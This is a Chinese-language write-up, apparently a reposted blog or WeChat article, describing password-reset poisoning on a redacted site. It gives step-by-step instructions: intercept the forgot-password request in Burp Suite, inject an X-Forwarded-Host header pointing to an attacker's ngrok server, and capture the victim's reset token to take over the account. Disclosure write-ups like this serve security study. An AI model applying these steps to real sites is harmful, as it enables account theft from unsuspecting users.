大家好,在这篇文章中我将分享一次有趣的接管他人帐户的过程。
关于漏洞
关于获取他人帐户的控制权,我曾在网上学习了不少前辈的经验和技巧,而在花费了6到8个小时后,我在目标站redacted.com的忘记密码页面中找到了一些可利用的痕迹,并最终找到了一个可接管他人帐户的漏洞。
工具
-
BurpSuite
-
Ngrok服务器
重现
1.我在[https://redacted.com/users/forgot_password](https://redacted.com/users/forgot_password)页面输入用户名,然后获取和重置密码有关的请求信息。
2.用Burpsuite拦截相关请求,并往其中添加请求头X-Forwarded-Host: bing.com。
3.很快你就能收到找回密码的电子邮件,其中含有重置密码链接:[https://bing.com/users/reset_password/tqo4Xciu806oiR1FjX8RtIUc1DTcm1B5Kqb53j1fLEkzMW2GPgCpuEODDStpRaES](https://bing.com/users/reset_password/tqo4Xciu806oiR1FjX8RtIUc1DTcm1B5Kqb53j1fLEkzMW2GPgCpuEODDStpRaES)。
是的,可以看到重设密码的链接居然在域名bing.com 后。现在我们用[https://redacted.com](https://redacted.com)替换[https://bing.com](https://bing.com),然后在浏览器中打开。
4.很好,这个重置密码链接有效,可以重置密码。
展开攻击
1.我先通过ngork创建属于我的服务器,也就是攻击者服务器。
2.转到[https://redacted.com/users/forgot_password](https://redacted.com/users/forgot_password)
页面,输入目标的用户名,并用Burpsuite捕捉请求。
3.在捕获的请求中,攻击者添加请求头X-Forwarded-Host: xxxxxx.ngrok.io
,其中ngrok.io等于ngork服务器地址。
4.此刻,受害者得到密码重置URL中的域是ngrok服务器地址。
5.只要受害者点击该链接攻击者就可以直接看到完整的重置密码的令牌。
6.当攻击者可以获得密码重置令牌时,他就可以直接接管目标帐户!
本文始发于微信公众号(疯猫网络):一种有趣的帐户接管手段
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论